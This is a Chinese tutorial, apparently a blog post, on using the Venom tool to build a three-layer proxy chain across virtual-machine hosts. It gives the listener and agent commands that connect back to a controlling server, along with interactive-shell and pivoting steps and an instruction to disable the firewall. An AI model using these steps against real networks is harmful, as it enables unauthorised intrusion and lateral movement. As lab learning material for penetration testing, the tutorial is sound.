Venom使用及三层代理搭建

声明：

我们倡导所有用户在合法和道德的框架内使用Venom工具，以促进技术的发展和应用
用户在使用Venom工具时，应严格遵守相关法律法规，任何违法行为均由用户自行承担责任，与本文章作者无关！

文章参考：
内网魔法神器Venom及代理演示—简书

Venom工具的使用_venom v1.1.0-CSDN博客

Venom代理工具使用–以三层代理为例_venom工具-CSDN博客

---

Venom定义

Venom是一款专为渗透测试人员设计的多级魔法工具，它使用Go语言开发，能够将多个节点连接起来，构建多级代理网络。通过Venom，用户可以轻松地将网络流量代理到多层内网，并管理代理节点。这款工具支持多种平台和架构，包括Linux、Windows、MacOS以及x86、x64、ARM、MIPS等
Venom的功能特性包括可视化网络拓扑、多级SOCKS5代理、多级端口转发、端口复用（支持Apache、MySQL等服务）、SSH隧道、交互式Shell、文件上传与下载以及节点间加密通信。它允许渗透测试人员在内网渗透过程中，通过多个节点作为跳板，实现网络流量的多层代理

当然Venom工具只是魔法工具的其中之一，proxifier，frp，EarthWorm，Neo-reGeorg等
大佬推荐的proxifier参考:
渗透必备，使用Proxifier玩转代理：
玩转代理

一、实验环境：

在虚拟机上创建环境，不涉及违法翻墙
内网的机器两台kali，一台windows IP地址：120.10.X.129、120.10.X.131、120.10.X.128

服务器要访问最里面的120.10.X.128依次访问，120.10.X.131只能和120.10.X.128相互访问，120.10.X.131可以和120.10.X.129，120.10.X.128访问而不能访问服务器；最后PC1能被服务器访问，也能和PC2相互访问；利用Venom来进行代理实现内网穿透

cmd打开当前文件目录，修改文件权限，chmod 777 admin_linux_x64，777为最高权限,一般不要将权限开到777！
admin.exe，查看命令用法

windows将防火墙关闭，如果想要知道自己端口是否打开，使用netstat -ano查看，如果想要开放指定端口的端口号，控制面板-> 系统和安全-> windows防火墙-> 高级设置 ->出站入站规则，右侧新建规则 ->规则类型选为端口,后面自行选择

二、第一层代理

admin_linux_x64文件来监听本地端口这里windows下文件直接写入，linux下需要加上./说明在当前目录下
代码如下（示例）：

admin.exe -lport 9000

将Venom文件上传目标服务器，并执行,内网的机器就是用agent.exe文件来连接服务器

./agent_linux_x64 -rhost 192.168.X.1 -rport 9000

venom服务端有回显则表示连接成功

在服务器上进行操作，help查看命令，常用命令：

• show，goto，shell，exit
• 执行show命令，可以看连接成功的节点
• goto 1 可以切换到1节点上面去
• shell 执行命令，建立连接
• exit 退出进程

show查看新增节点

goto 1切换到1节点

shell执行命令，建立连接，可以查看IP地址

exit退出当前进程

listen 9000监听9000端口

三、第二层代理

在第二台内网主机机器上面执行命令：
代码如下（示例）：

./agent_linux_x64 -rhost 120.10.X.129 -rport 9000

• 使用 -rhost 参数指定远程系统的 IP 地址或域名
• 使用 -rport 参数指定远程系统上监听的端口号

show查看新增节点

切换到节点2中: goto 2执行命令：shell，查看ip地址

listen 9000监听9000端口流量

四、第三层代理

在第三台内网主机机器上面执行命令：

agent.exe -rhost 120.10.X.131 -rport 9000

然后在服务器上进行操作，查看ip，切换3节点，shell命令，内网穿透成功

嘿嘿，至此三层魔法建立成功，呱唧呱唧！

总结

Venom 允许你管理多个会话，你可以使用 show 命令查看当前的会话列表，使用 shell 命令切换到特定的会话